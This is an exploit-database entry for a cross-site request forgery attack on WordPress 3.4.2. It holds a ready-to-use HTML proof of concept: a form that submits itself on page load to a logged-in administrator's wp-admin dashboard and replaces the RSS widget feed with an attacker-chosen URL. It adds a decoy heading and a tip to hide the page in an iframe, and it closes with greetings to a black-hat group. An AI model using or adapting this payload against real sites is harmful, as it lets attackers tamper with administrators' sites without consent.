WordPress 3.4.2 Cross Site Request Forgery

2012-09-22T00:00:00
ID 1337DAY-ID-19447
Type zdt
Reporter AkaStep
Modified 2012-09-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ============================================================
Vulnerable Software: WordPress (Version 3.4.2)
Downloaded from: http://wordpress.org/latest.zip
MD5SUM: (d670508d81e2fd060c2041441bc03300 *wordpress-3.4.2.zip)
===========================================================

Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MYSQL:  5.5.27

===========================================================
Vuln Desc: WordPress Version 3.4.2 is vulnerable to Cross Site Request Forgery Vulnerability.
The folloging CSRF exploit will change rss link if the currently logged administrator visits malicious page which containts the exploit below.
============================================================
                                             Proof Of Concept

==================WORDPRESS 3.4.2 CSRF exploit=================
<body onload="javascript:document.forms[0].submit()">
<form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post" class="dashboard-widget-control-form">
<h1>How Many Girls You Have? xD))</h1>
<!-- Idea for you: Iframe it -->
<input name="widget-rss[1][url]" type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php" />
  
<select id="rss-items-1" name="widget-rss[1][items]">
<option value='1' >1</option>
<option value='2' >2</option>
<option value='3' >3</option><option value='4' >4</option>
<option value='5' >5</option>
<option value='6' >6</option>
<option value='7' >7</option>
<option value='8' >8</option>
<option value='9' >9</option>
<option value='10' >10</option>
<option value='11' >11</option>
<option value='12' >12</option>
<option value='13' >13</option>
<option value='14' >14</option>
<option value='15' >15</option>
<option value='16' >16</option>
<option value='17' >17</option>
<option value='18' >18</option>
<option value='19' >19</option>
<option value='20' selected='selected'>20</option>
</select>
<input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/>
<input type="hidden" name="widget_id" value="dashboard_incoming_links" />
</form>
====================END OF=================================


SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
to all Aa Team + to all Azerbaijan Black HatZ +
      *Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep



#  0day.today [2018-01-24]  #